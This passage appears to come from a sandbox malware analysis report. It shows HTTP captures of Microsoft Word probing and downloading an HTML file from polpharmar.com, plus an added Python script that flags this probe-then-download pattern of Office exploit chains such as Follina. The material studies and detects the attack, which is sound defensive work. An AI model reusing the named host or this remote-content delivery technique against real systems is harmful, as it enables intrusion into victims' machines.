            Aug 1, 2022 10:49:55.436187983 CEST | 22 | OUT | PROPFIND / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            Depth: 0
            translate: f
            Content-Length: 0
            Host: polpharmar.com
            Aug 1, 2022 10:49:55.487442970 CEST | 23 | IN | HTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:55 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=97
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Aug 1, 2022 10:49:56.788990974 CEST | 23 | OUT | PROPFIND / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
            Depth: 0
            translate: f
            Content-Length: 0
            Host: polpharmar.com
            Aug 1, 2022 10:49:56.839572906 CEST | 24 | IN | HTTP/1.1 405 Method Not Allowed
            Date: Mon, 01 Aug 2022 08:49:56 GMT
            Server: Apache
            Allow: GET,POST,OPTIONS,HEAD
            Content-Length: 348
            Keep-Alive: timeout=5, max=96
            Connection: Keep-Alive
            Content-Type: text/html; charset=iso-8859-1
            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>405 Method Not Allowed</title></head><body><h1>Method Not Allowed</h1><p>The requested method GET is not allowed for this URL.</p><p>Additionally, a 405 Method Not Allowederror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            3 | 192.168.2.22 | 49174 | 91.235.116.180 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            Aug 1, 2022 10:49:52.900791883 CEST | 6 | OUT | GET /test.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: polpharmar.com
            Connection: Keep-Alive
            Aug 1, 2022 10:49:52.950392962 CEST | 7 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:52 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:53.274751902 CEST | 20 | OUT | HEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:53.324143887 CEST | 20 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:53 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=99
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:53.569763899 CEST | 20 | OUT | HEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:53.619056940 CEST | 21 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:53 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=98
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:56.855813026 CEST | 24 | OUT | GET /test.html HTTP/1.1
            Accept: */*
            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            Host: polpharmar.com
            If-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMT
            Connection: Keep-Alive
            Aug 1, 2022 10:49:56.904831886 CEST | 25 | IN | HTTP/1.1 304 Not Modified
            Date: Mon, 01 Aug 2022 08:49:56 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Keep-Alive: timeout=5, max=97
            Connection: Keep-Alive
            Aug 1, 2022 10:49:56.926876068 CEST | 25 | OUT | HEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:56.976238966 CEST | 25 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:56 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=96
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:57.166090012 CEST | 26 | OUT | HEAD /test.html HTTP/1.1
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Content-Length: 0
            Connection: Keep-Alive
            Aug 1, 2022 10:49:57.215281963 CEST | 26 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:57 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=95
            Connection: Keep-Alive
            Content-Type: text/html


            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
            4 | 192.168.2.22 | 49175 | 91.235.116.180 | 80 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Timestamp | kBytes transferred | Direction | Data
            Aug 1, 2022 10:49:54.392364979 CEST | 21 | OUT | HEAD /test.html HTTP/1.1
            Connection: Keep-Alive
            User-Agent: Microsoft Office Existence Discovery
            Host: polpharmar.com
            Aug 1, 2022 10:49:54.441466093 CEST | 22 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:54 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
            Aug 1, 2022 10:49:54.690577030 CEST | 22 | IN | HTTP/1.1 200 OK
            Date: Mon, 01 Aug 2022 08:49:54 GMT
            Server: Apache
            Last-Modified: Sun, 31 Jul 2022 09:45:54 GMT
            Accept-Ranges: bytes
            Content-Length: 12744
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: text/html
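The captured sessions above show the two-stage fetch Word performs for an external relationship target: repeated HEAD probes with the `Microsoft Office Existence Discovery` User-Agent, then a GET for the same /test.html from WINWORD.EXE with an MSIE User-Agent carrying the `ms-office` token. The script below is an added example, not code from the report or from Joe Sandbox. It parses rows in the fused `<timestamp><kB><IN|OUT><first line>` layout of the report's text export (the same rows with ` | ` between the columns are accepted too), pairs each response with the request before it, and flags any resource Office first probed and then downloaded itself. `SAMPLE_CAPTURE` is constructed from the rows shown above and abbreviated; the raw payload row is included only to show that non-HTTP rows are carried through without being treated as requests.

```python
"""Reconstruct Office's external-content fetch sequence from a Joe Sandbox HTTP capture.

Added example, not part of the Joe Sandbox report. SAMPLE_CAPTURE is constructed from
rows the report shows (host polpharmar.com, /test.html) and abbreviated.
"""
import re

# A row fuses timestamp, kBytes, direction and first line; " | " separators are optional.
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
    r"\s*\|?\s*(?P<kb>\d+)\s*\|?\s*(?P<dir>OUT|IN)\s*\|?\s*(?P<first>.*)$"
)
HTTP_METHODS = {"GET", "HEAD", "POST", "PUT", "OPTIONS"}
# User-Agent Office sends when it checks whether a linked external resource exists.
OFFICE_PROBE_UA = "Microsoft Office Existence Discovery"

SAMPLE_CAPTURE = """\
Aug 1, 2022 10:49:52.950537920 CEST17INData Raw: 6a 36 4b 31 54 52
Data Ascii: j6K1TR
Aug 1, 2022 10:49:53.274751902 CEST20OUTHEAD /test.html HTTP/1.1
User-Agent: Microsoft Office Existence Discovery
Host: polpharmar.com
Content-Length: 0
Aug 1, 2022 10:49:53.324143887 CEST20INHTTP/1.1 200 OK
Date: Mon, 01 Aug 2022 08:49:53 GMT
Content-Length: 12744
Content-Type: text/html
Aug 1, 2022 10:49:56.855813026 CEST24OUTGET /test.html HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; ms-office; MSOffice 14)
Host: polpharmar.com
If-Modified-Since: Sun, 31 Jul 2022 09:45:54 GMT
Aug 1, 2022 10:49:56.904831886 CEST25INHTTP/1.1 304 Not Modified
Date: Mon, 01 Aug 2022 08:49:56 GMT
"""


def parse_capture(text):
    """Split a capture into messages: dicts with ts, kb, dir, first line and headers."""
    messages = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if m:
            first = m["first"].strip()
            messages.append({
                "ts": m["ts"], "kb": int(m["kb"]), "dir": m["dir"], "first": first,
                # Raw TCP payload rows ("Data Raw: ...") are kept but are not HTTP.
                "http": first.startswith("HTTP/") or first.split(" ", 1)[0] in HTTP_METHODS,
                "headers": {},
            })
        elif messages and ":" in line:
            name, _, value = line.partition(":")
            messages[-1]["headers"][name.strip().lower()] = value.strip()
    return messages


def pair_responses(messages):
    """Attach each inbound status line to the most recent outbound request (in place)."""
    pending = None
    for msg in messages:
        if not msg["http"]:
            continue
        if msg["dir"] == "OUT":
            pending = msg
        elif msg["first"].startswith("HTTP/") and pending is not None:
            pending["status"] = int(msg["first"].split()[1])
            pending = None
    return messages


def office_external_fetches(messages):
    """Flag resources Office first probed with HEAD and then downloaded itself with GET."""
    probed = {}  # (host, path) -> timestamp of the first existence-discovery HEAD
    findings = []
    for msg in pair_responses(messages):
        if not msg["http"] or msg["dir"] != "OUT":
            continue
        parts = msg["first"].split()
        if len(parts) < 2:
            continue
        method, path = parts[0], parts[1]
        host = msg["headers"].get("host", "")
        ua = msg["headers"].get("user-agent", "")
        key = (host, path)
        if method == "HEAD" and ua == OFFICE_PROBE_UA:
            probed.setdefault(key, msg["ts"])
        elif method == "GET" and "ms-office" in ua.lower() and key in probed:
            findings.append({
                "host": host, "path": path,
                "probe_ts": probed[key], "fetch_ts": msg["ts"],
                "status": msg.get("status"),
                # Office pulling an external .html it linked itself is the shape of the
                # CVE-2021-40444 and Follina (CVE-2022-30190) delivery chains.
                "html_target": path.lower().endswith((".html", ".htm")),
            })
    return findings


if __name__ == "__main__":
    for hit in office_external_fetches(parse_capture(SAMPLE_CAPTURE)):
        print(hit)
```

The probe-then-GET pairing is what separates this traffic from a benign linked picture or template: a HEAD probe alone is Office checking a link, but a subsequent GET of an HTML resource by the Office process is the external oleObject fetch that the MSHTML-based chains rely on, so `html_target` is the field to alert on. The 304 on the GET means the sandbox had already fetched the page in an earlier session, so the payload body is in an earlier part of the capture rather than in this exchange.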



            Target ID:0
            Start time:10:49:20
            Start date:01/08/2022
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
            Imagebase:0x13f390000
            File size:1423704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high

            No disassembly